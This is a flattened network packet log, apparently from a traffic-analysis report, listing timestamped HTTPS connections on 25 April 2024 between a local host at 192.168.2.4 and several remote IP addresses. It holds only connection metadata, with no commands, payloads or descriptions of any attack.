                              Apr 25, 2024 20:22:08.117888927 CEST44349736172.67.128.112192.168.2.4
                              Apr 25, 2024 20:22:08.119554043 CEST44349736172.67.128.112192.168.2.4
                              Apr 25, 2024 20:22:08.119626999 CEST49736443192.168.2.4172.67.128.112
                              Apr 25, 2024 20:22:08.120459080 CEST49736443192.168.2.4172.67.128.112
                              Apr 25, 2024 20:22:08.120539904 CEST44349736172.67.128.112192.168.2.4
                              Apr 25, 2024 20:22:08.187176943 CEST49736443192.168.2.4172.67.128.112
                              Apr 25, 2024 20:22:08.187184095 CEST44349736172.67.128.112192.168.2.4
                              Apr 25, 2024 20:22:08.217550993 CEST49735443192.168.2.4172.67.128.112
                              Apr 25, 2024 20:22:08.294507980 CEST49736443192.168.2.4172.67.128.112
                              Apr 25, 2024 20:22:08.592863083 CEST49737443192.168.2.4142.250.9.99
                              Apr 25, 2024 20:22:08.592941999 CEST44349737142.250.9.99192.168.2.4
                              Apr 25, 2024 20:22:08.593043089 CEST49737443192.168.2.4142.250.9.99
                              Apr 25, 2024 20:22:08.593302965 CEST49737443192.168.2.4142.250.9.99
                              Apr 25, 2024 20:22:08.593337059 CEST44349737142.250.9.99192.168.2.4
                              Apr 25, 2024 20:22:08.675961971 CEST44349735172.67.128.112192.168.2.4
                              Apr 25, 2024 20:22:08.676042080 CEST44349735172.67.128.112192.168.2.4
                              Apr 25, 2024 20:22:08.676106930 CEST49735443192.168.2.4172.67.128.112
                              Apr 25, 2024 20:22:08.676650047 CEST49735443192.168.2.4172.67.128.112
                              Apr 25, 2024 20:22:08.676671028 CEST44349735172.67.128.112192.168.2.4
                              Apr 25, 2024 20:22:08.833864927 CEST49738443192.168.2.431.24.251.250
                              Apr 25, 2024 20:22:08.833914995 CEST4434973831.24.251.250192.168.2.4
                              Apr 25, 2024 20:22:08.833978891 CEST49738443192.168.2.431.24.251.250
                              Apr 25, 2024 20:22:08.834232092 CEST49738443192.168.2.431.24.251.250
                              Apr 25, 2024 20:22:08.834242105 CEST4434973831.24.251.250192.168.2.4
                              Apr 25, 2024 20:22:08.862112999 CEST44349737142.250.9.99192.168.2.4
                              Apr 25, 2024 20:22:08.862390995 CEST49737443192.168.2.4142.250.9.99
                              Apr 25, 2024 20:22:08.862447023 CEST44349737142.250.9.99192.168.2.4
                              Apr 25, 2024 20:22:08.863882065 CEST44349737142.250.9.99192.168.2.4
                              Apr 25, 2024 20:22:08.863976002 CEST49737443192.168.2.4142.250.9.99
                              Apr 25, 2024 20:22:08.865029097 CEST49737443192.168.2.4142.250.9.99
                              Apr 25, 2024 20:22:08.865114927 CEST44349737142.250.9.99192.168.2.4
                              Apr 25, 2024 20:22:08.904795885 CEST49737443192.168.2.4142.250.9.99
                              Apr 25, 2024 20:22:08.904820919 CEST44349737142.250.9.99192.168.2.4
                              Apr 25, 2024 20:22:08.950676918 CEST49737443192.168.2.4142.250.9.99
                              Apr 25, 2024 20:22:09.714732885 CEST4434973831.24.251.250192.168.2.4
                              Apr 25, 2024 20:22:09.715229034 CEST49738443192.168.2.431.24.251.250
                              Apr 25, 2024 20:22:09.715241909 CEST4434973831.24.251.250192.168.2.4
                              Apr 25, 2024 20:22:09.716262102 CEST4434973831.24.251.250192.168.2.4
                              Apr 25, 2024 20:22:09.716324091 CEST49738443192.168.2.431.24.251.250
                              Apr 25, 2024 20:22:09.724632978 CEST49738443192.168.2.431.24.251.250
                              Apr 25, 2024 20:22:09.724689007 CEST4434973831.24.251.250192.168.2.4
                              Apr 25, 2024 20:22:09.725003004 CEST49738443192.168.2.431.24.251.250
                              Apr 25, 2024 20:22:09.725011110 CEST4434973831.24.251.250192.168.2.4
                              Apr 25, 2024 20:22:09.765058041 CEST49738443192.168.2.431.24.251.250
                              Apr 25, 2024 20:22:10.572854042 CEST4434973831.24.251.250192.168.2.4
                              Apr 25, 2024 20:22:10.572938919 CEST4434973831.24.251.250192.168.2.4
                              Apr 25, 2024 20:22:10.572984934 CEST49738443192.168.2.431.24.251.250
                              Apr 25, 2024 20:22:10.574810982 CEST49738443192.168.2.431.24.251.250
                              Apr 25, 2024 20:22:10.574824095 CEST4434973831.24.251.250192.168.2.4
                              Apr 25, 2024 20:22:10.971180916 CEST49741443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:10.971260071 CEST44349741104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:10.971348047 CEST49741443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:10.972071886 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:10.972172022 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:10.972251892 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:10.972810030 CEST49741443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:10.972882986 CEST44349741104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:10.973089933 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:10.973126888 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:11.206249952 CEST44349741104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:11.217816114 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:11.250843048 CEST49741443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:11.261046886 CEST49741443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:11.261113882 CEST44349741104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:11.261888981 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:11.261949062 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:11.262408018 CEST44349741104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:11.262587070 CEST49741443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:11.265861988 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:11.266170025 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:11.276295900 CEST49741443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:11.276411057 CEST44349741104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:11.276905060 CEST49741443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:11.276938915 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:11.277189970 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:11.320163012 CEST44349741104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:11.330507994 CEST49741443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:11.330564022 CEST44349741104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:11.330605984 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:11.330682993 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:11.376830101 CEST49741443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:11.376939058 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:11.639657021 CEST49743443192.168.2.4184.24.36.112
                              Apr 25, 2024 20:22:11.639709949 CEST44349743184.24.36.112192.168.2.4
                              Apr 25, 2024 20:22:11.639990091 CEST49743443192.168.2.4184.24.36.112
                              Apr 25, 2024 20:22:11.643186092 CEST49743443192.168.2.4184.24.36.112
                              Apr 25, 2024 20:22:11.643201113 CEST44349743184.24.36.112192.168.2.4
                              Apr 25, 2024 20:22:11.797741890 CEST44349741104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:11.797784090 CEST44349741104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:11.797869921 CEST44349741104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:11.798010111 CEST49741443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:11.798327923 CEST49741443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:11.801960945 CEST49741443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:11.801986933 CEST44349741104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:11.867862940 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:11.868838072 CEST49744443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:11.868885994 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:11.869124889 CEST49744443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:11.869266987 CEST49744443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:11.869277000 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:11.876529932 CEST44349743184.24.36.112192.168.2.4
                              Apr 25, 2024 20:22:11.876842022 CEST49743443192.168.2.4184.24.36.112
                              Apr 25, 2024 20:22:11.879801989 CEST49743443192.168.2.4184.24.36.112
                              Apr 25, 2024 20:22:11.879810095 CEST44349743184.24.36.112192.168.2.4
                              Apr 25, 2024 20:22:11.880059004 CEST44349743184.24.36.112192.168.2.4
                              Apr 25, 2024 20:22:11.908123016 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:11.919282913 CEST49743443192.168.2.4184.24.36.112
                              Apr 25, 2024 20:22:11.960163116 CEST44349743184.24.36.112192.168.2.4
                              Apr 25, 2024 20:22:12.091845989 CEST44349743184.24.36.112192.168.2.4
                              Apr 25, 2024 20:22:12.091914892 CEST44349743184.24.36.112192.168.2.4
                              Apr 25, 2024 20:22:12.091973066 CEST49743443192.168.2.4184.24.36.112
                              Apr 25, 2024 20:22:12.092137098 CEST49743443192.168.2.4184.24.36.112
                              Apr 25, 2024 20:22:12.092137098 CEST49743443192.168.2.4184.24.36.112
                              Apr 25, 2024 20:22:12.092152119 CEST44349743184.24.36.112192.168.2.4
                              Apr 25, 2024 20:22:12.092159033 CEST44349743184.24.36.112192.168.2.4
                              Apr 25, 2024 20:22:12.096389055 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.098833084 CEST49744443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.098846912 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.099158049 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.099915981 CEST49744443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.099915981 CEST49744443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.099929094 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.099972010 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.126708031 CEST49745443192.168.2.4184.24.36.112
                              Apr 25, 2024 20:22:12.126737118 CEST44349745184.24.36.112192.168.2.4
                              Apr 25, 2024 20:22:12.126868963 CEST49745443192.168.2.4184.24.36.112
                              Apr 25, 2024 20:22:12.127161026 CEST49745443192.168.2.4184.24.36.112
                              Apr 25, 2024 20:22:12.127173901 CEST44349745184.24.36.112192.168.2.4
                              Apr 25, 2024 20:22:12.158736944 CEST49744443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.350989103 CEST44349745184.24.36.112192.168.2.4
                              Apr 25, 2024 20:22:12.351063967 CEST49745443192.168.2.4184.24.36.112
                              Apr 25, 2024 20:22:12.367162943 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.367196083 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.367218018 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.367237091 CEST49744443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.367249966 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.367286921 CEST49744443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.367563963 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.367619991 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.367657900 CEST49744443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.367662907 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.367799997 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.367839098 CEST49744443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.367845058 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.367873907 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.367902994 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.367912054 CEST49744443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.367916107 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.367954016 CEST49744443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.368083000 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.368153095 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.368194103 CEST49744443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.429465055 CEST49745443192.168.2.4184.24.36.112
                              Apr 25, 2024 20:22:12.429485083 CEST44349745184.24.36.112192.168.2.4
                              Apr 25, 2024 20:22:12.429774046 CEST44349745184.24.36.112192.168.2.4
                              Apr 25, 2024 20:22:12.437926054 CEST49745443192.168.2.4184.24.36.112
                              Apr 25, 2024 20:22:12.484117985 CEST44349745184.24.36.112192.168.2.4
                              Apr 25, 2024 20:22:12.508460999 CEST49744443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.508476973 CEST44349744104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.547549009 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.547665119 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.547776937 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.547857046 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.547874928 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.547903061 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.547923088 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.548039913 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.548098087 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.548147917 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.548223019 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.548280954 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.548295975 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.562525988 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.562587023 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.562751055 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.562812090 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.562906981 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.562936068 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.563057899 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.563121080 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.563220024 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.563291073 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.563344955 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.563524008 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.563683987 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.563767910 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.563852072 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.563867092 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.563934088 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.563980103 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.564555883 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.564618111 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.564637899 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.564732075 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.564783096 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.564798117 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.564882994 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.564933062 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.564946890 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.565516949 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.565588951 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.565604925 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.565694094 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.565743923 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.565759897 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.566353083 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.566411018 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.566423893 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.566515923 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.566579103 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.566595078 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.566684008 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.566740990 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.566754103 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.567203045 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.567262888 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.567276001 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.567378044 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.567435026 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.567450047 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.567537069 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.567591906 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.567606926 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.567748070 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.567801952 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.570558071 CEST44349745184.24.36.112192.168.2.4
                              Apr 25, 2024 20:22:12.570727110 CEST44349745184.24.36.112192.168.2.4
                              Apr 25, 2024 20:22:12.570775032 CEST49745443192.168.2.4184.24.36.112
                              Apr 25, 2024 20:22:12.573543072 CEST49742443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.573605061 CEST44349742104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.643119097 CEST49746443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.643172026 CEST44349746104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.643254995 CEST49746443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.643927097 CEST49746443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.643955946 CEST44349746104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.645368099 CEST49747443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.645461082 CEST44349747104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.645539045 CEST49747443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.646051884 CEST49747443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.646086931 CEST44349747104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.647217035 CEST49748443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.647258997 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.647306919 CEST49748443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.647707939 CEST49748443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.647723913 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.648947001 CEST49749443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.648973942 CEST44349749104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.649035931 CEST49749443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.649334908 CEST49749443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.649352074 CEST44349749104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.652216911 CEST49745443192.168.2.4184.24.36.112
                              Apr 25, 2024 20:22:12.652234077 CEST44349745184.24.36.112192.168.2.4
                              Apr 25, 2024 20:22:12.656151056 CEST49750443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.656164885 CEST44349750104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.656218052 CEST49750443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.656877995 CEST49750443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.656892061 CEST44349750104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.711942911 CEST49751443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.711963892 CEST44349751104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.712014914 CEST49751443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.712311983 CEST49751443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.712325096 CEST44349751104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.871695042 CEST44349746104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.877003908 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.879182100 CEST44349749104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.882536888 CEST44349747104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.885390043 CEST44349750104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.892433882 CEST49749443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.892445087 CEST44349749104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.892637968 CEST49748443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.892654896 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.893223047 CEST49746443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.893253088 CEST44349746104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.893392086 CEST49747443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.893430948 CEST49750443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.893450022 CEST44349750104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.893476963 CEST44349747104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.893640995 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.893704891 CEST49748443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.893778086 CEST44349749104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.893865108 CEST44349746104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.893884897 CEST49749443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.894171000 CEST44349747104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.894303083 CEST49748443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.894361019 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.894835949 CEST49749443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.895111084 CEST44349750104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.895172119 CEST49750443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.895344019 CEST44349749104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.895437956 CEST49746443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.895656109 CEST44349746104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.895658016 CEST49747443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.895874977 CEST44349747104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.895975113 CEST49750443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.896140099 CEST44349750104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.896187067 CEST49748443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.896195889 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.896236897 CEST49749443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.896245003 CEST44349749104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.896598101 CEST49746443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.896653891 CEST49747443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.896759987 CEST49750443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.896769047 CEST44349750104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.939068079 CEST44349751104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.940136909 CEST44349746104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.940157890 CEST44349747104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.940855026 CEST49751443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.940867901 CEST44349751104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.941824913 CEST44349751104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.941885948 CEST49751443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.942162991 CEST49751443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.942217112 CEST44349751104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.942373037 CEST49751443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.942378044 CEST44349751104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:12.950932026 CEST49748443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.950973034 CEST49749443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.951054096 CEST49750443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:12.997802019 CEST49751443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:13.150933981 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.150975943 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.151000977 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.151015997 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.151045084 CEST49748443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:13.151058912 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.151071072 CEST49748443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:13.151134968 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.151156902 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.151173115 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.151180029 CEST49748443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:13.151184082 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.151211977 CEST49748443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:13.151851892 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.151880980 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.151896954 CEST49748443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:13.151901960 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.151932955 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.151958942 CEST49748443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:13.151962042 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.152045965 CEST49748443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:13.152687073 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.152738094 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.152757883 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.152776957 CEST49748443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:13.152781010 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.152894974 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.152932882 CEST49748443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:13.152937889 CEST44349748104.21.47.80192.168.2.4
                              Apr 25, 2024 20:22:13.152986050 CEST49748443192.168.2.4104.21.47.80
                              Apr 25, 2024 20:22:13.153801918 CEST44349748104.21.47.80192.168.2.4
